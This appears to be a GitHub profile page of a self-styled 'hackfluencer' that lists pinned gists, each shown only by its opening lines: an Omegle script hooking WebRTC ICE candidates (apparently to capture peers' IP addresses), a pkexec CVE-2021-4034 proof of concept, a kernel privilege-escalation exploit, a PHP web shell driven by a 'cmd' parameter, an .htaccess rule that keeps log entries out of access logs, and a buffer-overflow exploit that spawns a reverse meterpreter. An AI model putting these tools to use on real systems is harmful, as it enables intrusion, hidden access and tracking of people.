Hi!.. im that hacker guy that your friends told you about. Hacking and vlog about the bountylife. Hackfluencer - Creative - Redteam - Programer - Student.
Pinned Loading
-
script-omegle.js
script-omegle.js 1window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection
2window.RTCPeerConnection = function(…args) {
3const pc = new window.oRTCPeerConnection(…args)
4pc.oaddIceCandidate = pc.addIceCandidate
5pc.addIceCandidate = function(iceCandidate, …rest) {
-
Linux Kernel - local privilege escal...
Linux Kernel - local privilege escalation 1/*2* #Linux Kernel Exploit3* Hi Hacker, Happy hacking VB4*5* -
blasty-vs-pkexec.c
blasty-vs-pkexec.c 1/*2* blasty-vs-pkexec.c3* ------------------------------------------------4* PoC for CVE-2021-4034, shout out to Qualys5* -
Simple trojan in PHP.error_reporting...
Simple trojan in PHP.error_reporting(0); 1<?php2error_reporting(0);
3$action = $_GET['cmd'];
4$pw = $_GET['pw'];
5$password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b";
-
http-htaccess.php
http-htaccess.php 1SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog
2<Limit GET POST HEAD>
3order deny,allow
4deny from all
5allow from 127.0.0.1 (or the remote ip of the server).
-
Chat Server - Remote Stack Buffer Ov...
Chat Server - Remote Stack Buffer Overflow 1# Exploit Title: Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)2# Usage: python remCS.py <victim-ip> <port>3# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=19904# CVE: CVE-2004-24665# Installer: http://www.echatserver.com/
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.